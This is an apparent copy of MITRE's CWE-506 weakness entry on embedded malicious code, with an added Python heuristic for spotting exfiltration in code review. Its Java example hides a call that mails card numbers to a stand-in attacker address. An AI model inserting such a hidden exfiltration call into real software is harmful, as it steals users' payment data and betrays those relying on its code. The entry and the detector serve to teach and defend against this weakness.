CWE-506: Embedded Malicious Code

Description

The product contains code that appears to be malicious in nature.

Submission Date: July 19, 2006, midnight

Modification Date: 2023-10-26 00:00:00+00:00

Organization: MITRE

Extended Description

Malicious flaws have acquired colorful names, including Trojan horse, trapdoor, timebomb, and logic-bomb. A developer might insert malicious code with the intent to subvert the security of a product or its host system at some time in the future. It generally refers to a program that performs a useful service but exploits rights of the program's user in a way the user does not intend.

Example Vulnerable Codes

Example - 1

In the example below, a malicious developer has injected code to send credit card numbers to the developer's own email address.


boolean authorizeCard(String ccn) {
    // Authorize credit card.
    // ...
    mailCardNumber(ccn, "evil_developer@evil_domain.com");
}
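As an added illustration (not part of the CWE entry or MITRE's material), the following line-based review heuristic flags the pattern in Example 1: a sensitive identifier passed on the same line as a hard-coded e-mail address or URL outside an allowlist. The identifier list, the `notifyOps` and `gateway.authorize` calls, and the allowlist are assumptions made for the example; block comments and multi-line calls are not handled.

```python
import re

# Constructed input: the page's example call plus a benign notification line.
SAMPLE_JAVA = '''\
boolean authorizeCard(String ccn) {
    // Authorize credit card.
    notifyOps("authorization started", "ops@example.com");
    mailCardNumber(ccn, "evil_developer@evil_domain.com");
    return gateway.authorize(ccn);
}
'''

# Assumption: identifiers that hold sensitive data follow these names.
SENSITIVE = re.compile(r'\b(ccn|cardNumber|pan|cvv|password|ssn)\b', re.I)
# A string literal (group 1 = its contents) or a // comment to end of line.
TOKEN = re.compile(r'"((?:[^"\\]|\\.)*)"|//.*')
# Hard-coded destination: e-mail domain (group 1) or URL host (group 2).
DEST = re.compile(r'[\w.+-]+@([\w-]+(?:\.[\w-]+)+)|https?://([\w.-]+)')


def split_line(line):
    """Return (code outside literals and comments, list of literal contents)."""
    code, literals, pos = [], [], 0
    for m in TOKEN.finditer(line):
        code.append(line[pos:m.start()])
        pos = m.end()
        if m.group(1) is not None:      # a string literal, not a comment
            literals.append(m.group(1))
    code.append(line[pos:])
    return ''.join(code), literals


def find_exfil_candidates(source, allowed_domains=frozenset()):
    """Flag lines that pass a sensitive identifier next to a hard-coded
    e-mail address or URL whose domain is not on the allowlist."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        code, literals = split_line(line)
        if not SENSITIVE.search(code):
            continue
        for literal in literals:
            for m in DEST.finditer(literal):
                domain = (m.group(1) or m.group(2)).lower()
                if domain not in allowed_domains:
                    findings.append((lineno, domain))
    return findings


if __name__ == "__main__":
    for lineno, domain in find_exfil_candidates(SAMPLE_JAVA):
        print(f"line {lineno}: sensitive value sent to hard-coded destination {domain}")
```

A hit is a prompt for manual review of the commit that introduced the line, not proof of malicious intent.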

Related Weaknesses

This table shows the weaknesses and high-level categories that are related to this weakness. These relationships are defined to give insight into similar items that may exist at higher and lower levels of abstraction.

Visit http://cwe.mitre.org/ for more details.